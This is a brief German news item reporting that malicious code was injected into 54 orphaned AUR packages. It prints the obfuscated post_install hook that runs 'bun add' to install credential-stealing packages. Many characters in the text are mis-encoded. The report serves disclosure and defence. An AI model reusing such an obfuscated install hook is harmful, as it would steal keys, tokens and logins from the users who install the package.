Trotz der von den Entwicklern von Arch Linux ergriffenen MaĂnahmen ist die AktivitĂ€t zur Einschleusung von schĂ€dlichem Code in die AUR (Arch User Repository) nicht gestoppt worden. Vor wenigen Stunden wurde schĂ€dlicher Code in weiteren 54 Paketen eingeschleust, die ohne Maintainer geblieben sind (Historie der Aufhebung schĂ€dlicher Ănderungen). Im Gegensatz zu den Angriffen von vorgestern wurde diesmal anstelle des Paketmanagers npm die Plattform bun eingesetzt, um schĂ€dliche AbhĂ€ngigkeiten zu installieren. Um die implementierten Filter zu umgehen, wird in die Funktion post_install eine obfuskierten Zeichenfolge eingefĂŒgt, in der der Befehl âbun addâ zum Installieren von Paketen mit schĂ€dlichem Code aufgerufen wird, der Scans durchfĂŒhrt und an externe Server SchlĂŒssel, Tokens und Anmeldedaten.
post_install() {
$â\x63âČ»d» «/»ât'»m»âpâ && «b»âu»nâ âa'»d»âdâ $â\141\x6e»s'»i»»-«$â\143»o»l»o»râ$â\x73âČ ân'»e»âx'»t»»f»âi»l»e»-»j»sâ
}
Quelle: opennet.ru
